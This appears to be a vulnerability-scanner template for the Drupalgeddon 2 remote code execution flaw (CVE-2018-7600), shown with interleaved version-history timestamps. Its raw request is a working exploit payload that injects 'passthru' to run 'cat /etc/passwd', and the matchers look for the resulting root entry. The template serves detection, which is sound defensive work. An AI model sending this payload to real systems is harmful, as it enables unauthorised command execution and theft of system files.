2021-02-15 13:33:33 +00:00
id : CVE-2018-7600
info :
name : Drupal Drupalgeddon 2 RCE
author : pikpikcu
severity : critical
reference : https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
2021-02-15 17:09:32 +00:00
tags : cve,cve2018,drupal,rce
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2018-7600
cwe-id : CWE-20
description : "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations."
2021-02-15 13:33:33 +00:00
requests :
- raw :
- |
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host : {{Hostname}}
Accept : application/json
Referer : {{Hostname}}/user/register
X-Requested-With : XMLHttpRequest
Content-Type : multipart/form-data; boundary=---------------------------99533888113153068481322586663
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="mail[#post_render][]"
passthru
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="mail[#type]"
markup
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="mail[#markup]"
cat /etc/passwd
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="form_id"
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition : form-data; name="_drupal_ajax"
matchers-condition : and
matchers :
- type : word
words :
- "application/json"
part : header
2021-02-15 17:09:32 +00:00
2021-02-15 13:33:33 +00:00
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-02-15 13:33:33 +00:00
part : body
2021-02-15 17:09:32 +00:00
2021-02-15 13:33:33 +00:00
- type : status
status :
- 200
